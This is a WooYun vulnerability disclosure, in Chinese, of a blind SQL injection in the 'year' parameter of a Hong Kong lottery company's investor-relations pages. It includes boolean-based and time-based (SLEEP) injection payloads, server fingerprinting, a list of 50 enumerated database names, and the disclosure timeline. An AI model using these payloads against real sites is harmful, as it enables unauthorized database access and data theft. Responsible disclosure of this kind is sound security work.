当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163842

漏洞标题:眾彩科技主站SQL Injection(香港地區)

相关厂商:众彩科技

漏洞作者: wooyun_def

提交时间:2015-12-24 16:20

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

眾彩科技股份有限公司(「眾彩股份」或「本公司」)乃於香港聯合交易所有限公司創業板上市。
眾彩股份為中國彩票界別中最全面之彩票服務供應商之一,其業務涵蓋國內╱五個省市,所涉及的領域由向中國彩票發行當局提供內部研發的軟硬件,伸延至建立本集團本身的彩票銷售點網絡以銷售中國彩票發行當局之產品。除了榮獲國內彩票界別中多項「第一」的殊榮外,眾彩股份亦為世界彩票業協會(「WLA」)之會員。

详细说明:

12.png


http://**.**.**.**/sc/ir_announce.php?year=2014
http://**.**.**.**/tc/ir_announce.php?year=2014
http://**.**.**.**/html/ir_announce.php?year=2014


Parameter: year (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: year=2014' AND 5085=5085 AND 'bsBs'='bsBs
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: year=2014' AND (SELECT * FROM (SELECT(SLEEP(5)))Fkvb) AND 'guYJ'='guYJ
---
[INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.12

漏洞证明:

available databases [50]:
[*] `bboard_d`lete`
[*] `new-ray_delete`
[*] aastocks_db_delete
[*] bboard2_delete
[*] chinastarch1_delete
[*] cks
[*] cks_new
[*] community_delete
[*] doubleindex_delete
[*] ginsengnatural_delete
[*] glkg_delete
[*] hds_2009_delete
[*] hds_delete
[*] information_schema
[*] jiuhao
[*] kotocms003
[*] kotoportal003
[*] l_xingyecopper_delete
[*] maryhelp_delete
[*] mh_delete
[*] midea_delete
[*] mysql
[*] mysql_old
[*] newworld_delete
[*] newworld_demo_delete
[*] ntop_delete
[*] onlinereport_delete
[*] performance_schema
[*] report
[*] report_delete
[*] samkadm_cms_delete
[*] smart_xtep_delete
[*] snowkiss
[*] tdn_delete
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_export
[*] tomocms2_log
[*] tomocms2_my
[*] tomocms2_restore
[*] tomocms2_sg
[*] tomocms2_temp
[*] tomocms2_tw
[*] tomocms2copy_delete
[*] tomocms_delete
[*] view_db_delete
[*] web2project_delete
[*] wordpress_delete
[*] xinhuapinmei

修复方案:

过滤

版权声明:转载请注明来源 wooyun_def@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-28 19:12

厂商回复:

已將事件通知有關機構

最新状态:

暂无